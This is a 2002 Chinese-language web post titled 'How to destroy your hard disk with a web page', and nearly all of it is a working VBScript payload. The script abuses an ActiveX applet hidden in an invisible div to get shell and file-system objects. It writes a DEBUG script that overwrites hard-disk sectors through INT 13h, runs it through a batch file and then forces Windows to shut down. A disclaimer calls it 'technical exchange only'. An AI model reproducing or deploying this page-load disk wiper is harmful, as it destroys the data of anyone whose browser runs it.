标题:怎样用网页报废你的硬盘!
--------------------------------------------------------------------
作者:吴晓东 qq:10096799 e-mail:sendtowxd@163.net
发表时间:2002-05-05
官方网站:http://jazzyfree.nease.net
如有不懂请与本人联系!本文章仅仅做技术交流,如用做其他用途,恕于本人无关 :)
--------------------------------------------------------------------
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"applet name=bei"&"jing height=0 width=0 code=com.ms."&"activex.active"&"xcomponent></applet></div>"
set appleobject = document.applets("beijing")
appleobject.setclsid("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
appleobject.createinstance()
set wshell = appleobject.getobject()
appleobject.setclsid("{0d43fe01-f093-11cf-8940-00a0c9054228}")
appleobject.createinstance()
set fso = appleobject.getobject()
appleobject.setclsid("{13709620-c279-11ce-a49e-444553540000}")
appleobject.createinstance()
set shell = appleobject.getobject()
intxt="a$-$mov ax,0301$-$mov bx,0100$-$mov cx,0100$-$mov dx,0080$-$int 13$-$int 3$-$$-$g$-$$-$w 100 2 0 100$-$w 100 3 0 100$-$q$-$"
intxt=replace(intxt,chr(36)&chr(45)&chr(36),vbcrlf)
set fin=fso.opentextfile("in.txt",2,true)
fin.write intxt
fin.close
set bat=fso.opentextfile("com.bat",2,true)
bat.write "@echo off"&vbcrlf&"path="&wph&"\command"&vbcrlf&"debug<in.txt>nul"&vbcrlf&"exit"
bat.close
wshell.run("com.bat")
wshell.run("rundll32.exe user.exe,exitwindows")
</script>
--------------------------------------------------------------------
作者:吴晓东 qq:10096799 e-mail:sendtowxd@163.net
发表时间:2002-05-05
官方网站:http://jazzyfree.nease.net
如有不懂请与本人联系!本文章仅仅做技术交流,如用做其他用途,恕于本人无关 :)
--------------------------------------------------------------------